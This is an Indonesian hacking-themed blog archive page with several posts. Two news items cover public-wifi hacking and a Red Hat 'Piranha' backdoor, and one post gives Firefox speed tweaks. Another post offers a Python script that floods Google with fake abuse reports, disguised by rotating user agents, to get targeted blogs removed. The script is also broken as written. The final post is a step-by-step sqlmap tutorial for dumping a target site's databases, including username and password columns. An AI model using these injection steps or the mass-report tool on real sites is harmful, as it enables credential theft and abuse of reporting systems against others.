Home » Posts filed under Hacking
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Hanya Butuh 11 Menit Untuk Membobol Wifi

Posted by bestlian Wednesday, January 11, 2017 0 comments

Hanya butuh waktu singkat saja untuk bisa masuk ke jaringan wifi publik yang biasa ada di tempat-tempat umum. Itu membuktikan betapa lemahnya keamaanan jaringan wifi sehingga kita dapat dengan mudah untuk masuk dan menangkap informasi dari lalu lintas wifi tersebut.

Yap, hanya butuh sebelas menit saja, gadis berusia 7 tahun ini membuktikannya sendiri. Adalah Betsy Davies yang membobol jaringan wifi publik hanya dengan menonton tutorial. Gadis yang berasal dari Dulwich di South London ini berhasil masuk kejaringan hanya dalam waktu 10 menit 54 detik.

Berbekal video tutorial dia menyiapkan segalanya untuk mendapatkan akses dengan cara nakal tersebut. Gadis ini berhasil menguping lalu lintas internet yang ada di wifi umum tersebut. Bayangkan saja, jika gadis berusia 7 tahun saja bisa melakukan apa yang disebut "Man In The Middle (MITM)" attack, apalagi para hacker yang memang bertujuan untuk kriminal?.

Mungkin Betsy melakukan hal tersebut hanya untuk iseng saja, tapi para hacker jahat bisa melakukan apa saja. Dari mulai rekam chat, hack laptop atau handphone, atau bahkan menangkap data transaksi online kalian. Untuk itu ada baiknya kita memproteksi diri semisal menggunakan akses VPN.

Oops... buat yang nyari tutorial bobol wifinya, silahkan cari saja di google atau youtube.

source: techworm

Mozilla lemot, Ini Solusinya

Posted by bestlian Tuesday, January 27, 2015 0 comments
mozilla lemot, firefox hacking tips

Terkadang kita males kalau internet sudah down, lelet, lemot atau apalah. Itu bikin loading browser semakin lama dan otomatisnya quota habis buat nungguin loading doang. Buat sebagian orang mungkin belum tau kalau browser kita bisa dimaksimalkan kinerjanya dengan beberapa cara berikut.
  1.  Aktifkan pipelining

    Untuk mengaktifkannya:

    Ketik about:config di address bar (kotak pencarian) klik saya akan berhati-hati > cari network.http.pipelining dan network.http.proxy.pipelining klik dua kali rubah nilainya menjadi true, lalu cari network.http.pipelining.maxrequests  klik dua kali dan set nilainya jadi 8.

    Ini akan secara drastis mengurangi waktu download tiap halaman.
  2. Percepat Render

    Untuk mengaktifkannya:

    Ketik lagi about:config dan tekan Enter > klik kanan di mana saja (untuk pengguna Apple gunakan ctrl-klik) dan pilih New > Integer > Ketik content.notify.interval sebagai nama preferensi Anda > klik OK, masukkan 500000 > klik OK lagi. Klik kanan lagi di jendela dan pilih New > Boolean > ketik content.notify.ontimer > Set ke True lalu klik OK.
  3. Percepat Loading

    Untuk mengaktifkannya: Boolean
    Ketik about:config dan tekan Enter > klik kanan di jendela dan pilih New > Integer > Ketik content.switch.threshold > klik OK > masukkan 250000 > klik OK.
  4. Menghentikan interupsi yang tidak perlu

    Untuk mengaktifkannya:

    Ketik about:config, tekan Enter > klik kanan di jendela > pilih New > Boolean > Jenis content.interrupt.parsing > klik OK > set nilainya ke False dan klik OK.
  5. Blok video atau iklan flash

    Ketik about:addons lalu enter, dipencarian ketik flashblock lalu enter. Instal ekstensi Flashblock akan memblokir semua applet Flash baik itu iklan ataupun video yang embed / autoplay.
  6. Meningkatkan ukuran cache

    Untuk mengaktifkannya:

    Ketik about:config dan tekan Enter > klik kanan di mana saja di jendela > pilih New > Integer > Ketik browser.cache.memory.capacity > klik OK> masukkan 65536 dan klik OK > restart browser Anda untuk menerapkan settingan yang baru, cache yang lebih besar.
  7. Aktifkan TraceMonkey

    Fitur ini adalah fitur baru firefox dapat mengubah Javascript lambat ke dalam kode x86 yang super-cepat. Cara mengaktifkannya  ketik about:config di address bar dan tekan Enter. Ketik JIT pada kotak filter, lalu klik ganda javascript.options.jit.chrome dan javascript.options.jit.content ubah nilai-nilainya menjadi true.
  8. Kompres Data

    Instal applet Java toonel.net.Ini dapat mengatur lalu lintas data web anda ke server sendiri. Bahkan dapat mengompres file JPEG sehingga memungkinkan Anda untuk mengurangi kualitasnya sehingga loading lebih cepat. Hal ini sangat berguna untuk memotong transfer data Anda, sangat berguna jika Anda hanya memiliki kuota terbatas.
Oke, sekian tipsnya dan sampai ketemu lagi di tips berikutnya.
Salam OpenSource..

Ada Backdoor Di Redhat

Posted by bestlian Wednesday, October 29, 2014 0 comments
backdoor redhat

Sepertinya Microsoft Windows bukanlah satu-satunya sistem operasi di pasar yang memiliki backdoor bagi para penggunanya. Walaupun pejabat Red Hat meremehkan keseriusan celah tersebut, tim di Internet Security Systems, Inc melaporkan backdoor tersebut memungkinkan penyusup untuk mengakses dan memodifikasi file pada sistem yang menjalankan versi terbaru dari Red Hat Linux.

Menurut laporan, backdoor tersebut memiliki link ke web admin utility yang disebut "Piranha," dan memungkinkan pengguna jahat untuk menjalankan utilitas di situs Web Red Hat-diluar dari browser Web.

Kedua, dan yang lebih serius lagi, backdoor tersebut memberikan pengguna hak akses untuk menggunakan perintah "Change Password" untuk mengubah password dan menambahkan baris tambahan kode yang dapat melaksanakan fungsi apapun server itu sendiri dapat melakukan. Dengan ini, pengguna yang jahat bisa mendapatkan kontrol penuh dari server, dan melakukan berbagai tindakan dalam sistem itu.

Walaupun Hanya para pengguna  Red Hat dengan Piranha yang kemungkinan rentan, Internet Security Systems, Inc. sebagai peneliti menyarankan pengguna Red Hat download dan segera menginstal patch.

Pejabat Red Hat telah membantah keseriusan cacat, mengatakan bahwa kerentanan hanya mempengaruhi server yang masih menggunakan paswword default Piranha (sengaja ditetapkan oleh Red Hat pengembang) yang dikenal dengan penyusup. Pejabat juga membantah lubang sebagai "backdoor" ke dalam sistem, namun para ahli keamanan menekankan bahwa ini sebuah cacat yang serius.

sumber dari: betanews.com

Mass Report Blog to Google "domainreporter.py"

Posted by bestlian Wednesday, June 4, 2014 0 comments
"domainreporter.py"

The program is written in python pemogramming, the program will automatically report to Google because the site is very containing hate speec, I hope will disappear as it has in the report to the database in large quantities certainly more helpful if you join this program running, more and more reports that google will be accepted sooner.
You can write a list of websites that would like reported in the code. This is the code:

#!/usr/bin/python
# programmer : gunslinger_ <yudha.gunslinger@gmail.com>
# please use this tools to vanish that domain, i hope google responds this !
# this program is defeated form encryption multipart/form-data
# so you need to install http://pypi.python.org/pypi/MultipartPostHandler/0.1.0 python module
# tips :
# - extract the folder
# - python setup.py build
# - sudo python setup.py install
# then program ready to rock !
import urllib2, random, sys
try:
    import MultipartPostHandler
except ImportError:
    print "[*] Please install MultipartPostHandler first"

def main():
    try:
        domain        = ['http://xxxxxxx.blogspot.com/',
                'http://bad-website.com/',
                'http://tipe-your-web-list.com/',
                ]
        ouruseragent     = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
                'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1',
                'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
                'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
                'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
                    'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
                    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
                    'Microsoft Internet Explorer/4.0b1 (Windows 95)',
                    'Opera/8.00 (Windows NT 5.1; U; en)',
                'amaya/9.51 libwww/5.4.0',
                'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
                'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
                'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
                'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
                'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
                'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
        success = 'Thanks for reporting this possible Terms of Service violation. We will examine it soon and take action as necessary.'
        opener     = urllib2.build_opener(MultipartPostHandler.MultipartPostHandler)
        counter = 1
        while 1:    
            opener.addheaders = [('User-agent', random.choice(ouruseragent))]
            params = { 'extra.blog_URL' : random.choice(domain)
                }
            result = openserver.read()
            if success in result:
                sys.stdout.write("%s[*] %s way success reporting domain %s to google ! %s" % ("\r", int(counter), params['extra.blog_URL'], " "*80))
                sys.stdout.flush()
            else:
                print "[*] Failed ! please try again !"
                sys.exit(1)
            counter = int(counter) + 1
    except KeyboardInterrupt:
        print "\n[*] Exiting program\n"
        sys.exit(1)
    except urllib2.HTTPError:
        print "\n[*] Connections problem, please try again !\n"
        sys.stdout(1)

if __name__ == '__main__':
    print "domainreporter.py"
    print "gunslinger_ <yudha.gunslinger@gmail.com>"
    print "edited by MeNinBoX"
    main()

Copy paste the code to your text editor and save in python extension like "test.py". Edit the domain list.
for using just type on terminal :
python test.py

thanks to gunslinger who write this code.
More friends use your code, very soon that web block by Google.

sqlmap ala newbie

Posted by bestlian Thursday, January 17, 2013 0 comments
Buat yang ga tau sqlmap, sqlmap software berbasis text untuk penetrasi lewat sql, biasanya disebut sql injection / sqli yang bisa di jalankan di windows/linux. Untuk di windows silahkan install dulu python nya.

oke sekarang kita mulai tutornya..

*WARNING :INI HANYA UNTUK PEMBELAJARAN, PENGGUNAAN ATAS TANGGUNG JAWAB SENDIRI

pertama jangan pengen instan bos,,,
misalnya dengan memasukan perintah langsung kaya gini:
./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump
jarang berhasil,.

mending ikutin scan target cara newbie, kita pecah perintah diatas jadi beberapa bagian:

1. fethcing banner <<untuk membuat route injection, dengan metode tebak-tebakan untuk menemukan dbms (database management system) contoh:mysql, oracle, etc.
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --banner

2. fetching user <<analisis user yang ada pada dbms,injection akan lebih mudah karena telah terpetakan oleh perintah pertama
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --current-user --current-db

3. fetching database <<untuk me list daftar database
perintah: ./sqlmap.py -u "URL" --random-agent --threads X --dbs

4. fetching table <<untuk mengetahui table yang ada pada database yang telah kita ketahui sebelumnya.
perintah: ./sqlmap.py -u "URL" --random-agent --threads X -D namadb --tables


seperti ini kira-kira tampilan table databasenya..

table sqlmap

5. fetching kolom <<untuk mengetahui isi column dari table yang kita tentukan
perintah : ./sqlmap.py -u "URL" --random-agent --threads X -D namadb -T tab --columns

nah kalo yang ini tampilan column nya
column sqlmap


6. terakhir fetching isi kolom << melihat isi data column nya :D
perintah: ./sqlmap.py -u "URL" --random-agent --threads X -D namadb -T tab -C username,password --dump


ket:
URL    = web yang ada bug sqli contoh www.target.com/index.php?id=2
X      = maksimum injection kalo ga salah ganti aja 10 misalnya
namadb = nama database yang ingin di ketahui
tab    = tabel yang ingin kita buka misal jos_users untuk joomla (tergantung dari database)

username,password = tergantung dari table yang kita dapat

untuk melihat hasil dumpnya, buka folder sqlmqp - output - www.target.com - dump

oke, sekian dulu deh :)
r0ckm3n


Copyleft Content © 2013 All rights reserved.

Linux Is Fun created by Faris Blogs | Published by blogger